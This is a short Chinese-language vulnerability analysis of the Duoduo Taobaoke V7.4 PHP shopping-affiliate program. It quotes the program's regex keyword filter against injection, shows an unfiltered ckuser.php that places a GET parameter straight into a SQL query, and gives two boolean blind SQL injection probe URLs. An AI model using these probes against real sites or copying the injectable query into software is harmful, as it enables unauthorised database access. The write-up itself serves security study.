多多淘宝客V7.4绕过防注入及一个注入漏洞的分析
由于程序是开源程序 <br />并下载其程序看了一番。其实程序员还是有一点安全意识的: <br />防注入代码: <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode6"> <br />//要过滤的非法字符 <br />$ArrFiltrate = array ( <br />"#union#i", <br />"#<script#i", <br />"#/script>#i", <br />"#select#i", <br />"#alert#i", <br />"#javascript#i", <br />"#<table#i", <br />"#<td#i", <br />"#\"#i", <br />"#\'#i", <br />"#delete#i", <br />"#vbscript#i", <br />"#applet#i", <br />"#frame#i", <br />"#<div#i", <br />"#update#i", <br />"#'#i", <br />"#union #i", <br />"#select #i", <br />"#delete #i", <br />"#update #i", <br />"#and #i", <br />"#;#i", <br />"#update#i" <br />); <br />$replacements=''; <br />function FunStringExist(&$array,$ArrFiltrate,$replacements) <br />{ <br />if (is_array($array)) <br />{ <br />foreach ($array as $key => $value) <br />{ <br />if (is_array($value)) <br />FunStringExist($array[$key],$ArrFiltrate,$replacements); <br />else <br />$array[$key] = preg_replace($ArrFiltrate, $replacements, $value); <br />} <br />} <br />} <br />FunStringExist($_GET,$ArrFiltrate,$replacements); <br />FunStringExist($_POST,$ArrFiltrate,$replacements); <br /></div><br />这段代码多少还是有瑕疵的、只过滤www.jb51.net get post 我们只要找调用request的地方 <br />别一个文件并没有调用防注入程序,导致字符注入、但受gpc影响 <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode7"> <br />header("Content-Type:text/html;charset=utf-8"); <br />include "../comm/config.php"; <br />$uname = trim($_GET["name"]); <br />if($uname==''){ <br />echo "true"; <br />}else{ <br />$con = @mysql_connect("$dbserver","$dbuser","$dbpass" )or die(ERR_DB); <br />mysql_select_db("$dbname",$con)or die("can not choose the dbname!"); <br />$query="select * from ".$BIAOTOU."user where ddusername='".$uname."'"; <br />mysql_query("set names utf8"); <br />$res=mysql_query($query); <br />if(mysql_num_rows($res)!=0) <br />{echo "true";} <br />else <br />{echo "false";} <br />} <br /></div><br />首先注册一个用户.让程序能过判断 <br />ckuser.php?name=maxadd' and 1=1 and ''=' <br />返回true <br />ckuser.php?name=maxadd' and 1=2 and ''=' <br />返回false <br />
頁:
[1]